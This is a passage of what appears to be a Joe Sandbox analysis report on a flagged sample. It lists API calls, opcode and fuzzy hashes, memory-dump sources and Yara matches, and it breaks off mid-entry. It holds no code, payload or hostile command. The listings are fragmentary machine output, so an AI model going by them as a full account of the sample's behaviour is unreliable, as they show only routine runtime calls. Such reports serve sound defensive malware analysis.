                                                                      • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                      • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                      • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                      • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,?,024D009C,00000000,00457970,0000000C,024D01F3,00000000,00000002,00000000), ref: 024D00E7
                                                                      • TerminateProcess.KERNEL32(00000000,?,024D009C,00000000,00457970,0000000C,024D01F3,00000000,00000002,00000000), ref: 024D00EE
                                                                      • ExitProcess.KERNEL32 ref: 024D0100
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                      • Instruction ID: 54e88e73f246356a51daebed9234b39cbfb70eae6ed8c4336b89a175edfc4d76
                                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                      • Instruction Fuzzy Hash: 78E0B635000548EBCF126F55DD18A593F6AEB46B46F54402AF9058B231CB36DA42DE44
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                      • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                      • ExitProcess.KERNEL32 ref: 0042FE99
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                      • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                      • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .$GetProcAddress.$l
                                                                      • API String ID: 0-2784972518
                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                      • Instruction ID: 83b1f6a1e96997a5a0f1650ef269b331ccf1d5237051adc979373b0a2e30b189
                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                      • Instruction Fuzzy Hash: 733127B6900609DFEB10CF99C884BAEBBF9FF58324F15504AD841A7310D771EA45CBA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /
                                                                      • API String ID: 0-2043925204
                                                                      • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                      • Instruction ID: d85d8dee3e90d8daf1d0437d29076fa47462436021d2d8eb2ba51ac876f0bcee
                                                                      • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                      • Instruction Fuzzy Hash: 39410876500219AFCB209FB9DC58EBB7779EB84714F50466EF905D7280E7319D42CB50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /
                                                                      • API String ID: 0-2043925204
                                                                      • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                      • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                      • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                      • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: GetLocaleInfoEx
                                                                      • API String ID: 2299586839-2904428671
                                                                      • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                      • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                      • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                      • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                      • Instruction ID: 570c992c6f964cf7d08cbd3f112a0dbb40093d4f48d4c61d764f9d2695176ec2
                                                                      • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                      • Instruction Fuzzy Hash: 63022B75E002199BDF54CFADC8806AEB7F2EF48324F25816ED919E7380D735A945CB90
                                                                      APIs
                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 024A262C
                                                                      • PostQuitMessage.USER32(00000000), ref: 024A27CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessageNtdllPostProc_QuitWindow
                                                                      • String ID:
                                                                      • API String ID: 4264772764-0
                                                                      • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                      • Instruction ID: 4131593c5325b6d7a27996fea621bafce29a0c1cb8874c88a1ca774810e82398
                                                                      • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                      • Instruction Fuzzy Hash: E541412596434095E730FFA5BC55B2633B0FF64B22F10252BD528CB2B2E3B28540C75E
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024D6F21,?,?,00000008,?,?,024DF3E2,00000000), ref: 024D7153
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                      • Instruction ID: b41872cf36f18aac3f0e420d72c941380e7b4fb529bb315fd269d7bb5fe6de57
                                                                      • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                      • Instruction Fuzzy Hash: E6B14B312106089FD716CF28C49AB69BBE1FF45368F658659E89ACF3E1C335D992CB40
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                      • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                      • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                      • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D21A0
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21AD
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024DB900
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2955987475-0
                                                                      • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                      • Instruction ID: f44696654a57d3047933fd298932f5a799d61d0299570dfed513d296e2c4a412
                                                                      • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                      • Instruction Fuzzy Hash: DF21CF32A5024AABDF24AF25DC61BBB77ACEF04318F0141BBED01D6251EB79D945CB50
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2955987475-0
                                                                      • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                      • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                      • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                      • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                      • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024D0A1C,?,024DBC89,00000000,?,?,?), ref: 024DB5A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                      • String ID:
                                                                      • API String ID: 2016158738-0
                                                                      • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                      • Instruction ID: 1289fd5e8a029b290c88f4e954d417245e98fe40db6c9358a909b01abc6dfa31
                                                                      • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                      • Instruction Fuzzy Hash: 3911C23A2007059FDB189F39C8B16BABB92FF8475CB19482EDA4687B40D771A542CB40
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                      • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                      • String ID:
                                                                      • API String ID: 2016158738-0
                                                                      • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                      • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                      • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                      • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024DB87A,00000000,00000000,?), ref: 024DBB08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                      • String ID:
                                                                      • API String ID: 787680540-0
                                                                      • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                      • Instruction ID: 52a5fe72f5feb53bb5888ab0087b40cfcd99244da23517cc52fd4f99c522f7f8
                                                                      • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                      • Instruction Fuzzy Hash: 1FF0F936A001156BDB289A25CC55BBB7758EB4075CF06446ADD05A3644EB70BE42C6D0
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                      • String ID:
                                                                      • API String ID: 787680540-0
                                                                      • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                      • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                      • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                      • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D21A0
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21AD
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024DB900
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2955987475-0
                                                                      • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                      • Instruction ID: c1f2bb2c091bac6530f121d6f1f09d1e997cfddd8b9c4bfef878f678abe44761
                                                                      • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                      • Instruction Fuzzy Hash: FD014432B512449BCB14EF34DCA0ABA33A9DF48311F0542FFEE02DB281DA759D058B50
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                      • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024D0A1C,?,024DBC4D,024D0A1C,?,?,?,?,?,024D0A1C,?,?), ref: 024DB61B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                      • String ID:
                                                                      • API String ID: 2016158738-0
                                                                      • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                      • Instruction ID: f0675982ec6a7e94de63587888102ba0d27a4eaf1f5b316d4bc50b3159fa4bbd
                                                                      • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                      • Instruction Fuzzy Hash: 8DF0C23A3007045FDB245F39DCA1B7A7B95EF8176CF16442EFA058B650D7B198028A44
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                      • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                      • String ID:
                                                                      • API String ID: 2016158738-0
                                                                      • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                      • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                      • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                      • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024D047A,?,00000004), ref: 024D547A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                      • Instruction ID: fa67da4856af227c24ec5d8e6d38348c37a7ac4764499c5ca9ca2c593da69cc3
                                                                      • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                      • Instruction Fuzzy Hash: 87F0BB31680318BFDB115F61DC11F6E7B66EF04F12F90415AFD0566290DF729D20AA9A
                                                                      APIs
                                                                        • Part of subcall function 024CE654: RtlEnterCriticalSection.NTDLL(02050DAF), ref: 024CE663
                                                                      • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024D506C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                      • String ID:
                                                                      • API String ID: 1272433827-0
                                                                      • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                      • Instruction ID: f9a6a2098fcce84ac4b6d6a85d0e98edfcf93c5a673bda32751b6d9cbabb0433
                                                                      • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                      • Instruction Fuzzy Hash: 40F03C36A20304DBE710EF69D905B9D77E1AF05722F10416AF900DB2E1CB7999448F59
                                                                      APIs
                                                                        • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                      • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                      • String ID:
                                                                      • API String ID: 1272433827-0
                                                                      • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                      • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                      • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                      • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                      • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024DBCAB,024D0A1C,?,?,?,?,?,024D0A1C,?,?,?), ref: 024DB520
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                      • String ID:
                                                                      • API String ID: 2016158738-0
                                                                      • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                      • Instruction ID: d6dedad8ebb09f833aa810bd6a3fd29549b27645a4d6e1017e93e7fea36cd041
                                                                      • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                      • Instruction Fuzzy Hash: 80F0A03A30020957CB089F36D86576ABF94EFC1754B5A405EEF098B290D675A942C790
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                      • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                      Memory Dump Source
